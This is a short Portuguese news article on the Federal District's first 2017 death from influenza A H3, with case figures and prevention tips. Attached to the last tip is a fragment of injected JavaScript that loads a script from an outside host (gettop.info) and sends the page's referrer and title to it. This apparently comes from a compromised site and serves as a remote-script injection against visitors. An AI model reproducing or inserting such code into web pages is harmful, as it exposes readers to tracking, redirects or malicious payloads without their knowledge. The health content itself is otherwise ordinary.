DF registra primeira morte por gripe em 2017

A Secretaria de Saúde confirmou nesta quinta-feira (27) a primeira morte relacionada ao vírus respiratório influenza A H3. A vítima foi uma moradora do Riacho Fundo, de 43 anos, portadora de doença crônica. Em 2016, a síndrome respiratória grave (SRAG) fez nove vitimas no DF, sendo sete por influenza A H1N1, um por adenovírus e um por metapneumovírus.

Segundo a Secretaria de Saúde, foram notificados 195 casos da síndrome em 2017, enquanto, no mesmo período do ano passado, ocorreram 175 notificações.

A Saúde frisa que os casos de SRAG confirmados por vírus respiratório, até a semana passada, estão dentro do período sazonal. Portanto, não há necessidade de pânico por parte da população do Distrito Federal. Os portadores de doenças crônicas não transmissíveis devem buscar a vacinação, além dos demais grupos prioritários (veja mais aqui).

Como evitar a transmissão da gripe e outras doenças respiratórias:

– Frequente lavagem e higienização das mãos, principalmente antes de consumir algum alimento;

– Utilizar lenço descartável para higiene nasal;

– Cobrir nariz e boca quando espirrar ou tossir e higienizar as mãos em seguida;

– Evitar tocar mucosas de olhos, nariz e boca;

– Não compartilhar objetos de uso pessoal, como talheres, pratos, copos e garrafas;

– Manter os ambientes bem ventilados;

– Evitar contato próximo a pessoas que apresentem sinais ou sintomas de gripe;

– Evitar aglomerações e ambientes fechados;

– Adotar hábitos saudáveis, como alimentação balanceada e ingestão de líquidos.s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Deixe um comentário